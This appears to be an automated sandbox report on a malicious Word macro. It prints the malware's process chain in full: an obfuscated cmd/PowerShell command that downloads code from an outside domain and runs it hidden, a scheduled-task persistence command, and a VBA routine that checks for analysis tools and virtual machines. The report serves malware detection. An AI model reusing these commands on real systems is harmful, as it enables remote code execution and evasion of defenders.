Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -Jump to behavior

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Evasive VBA macro found (process check)Show sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system idle process","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("system","ida")Name: KYEPC270
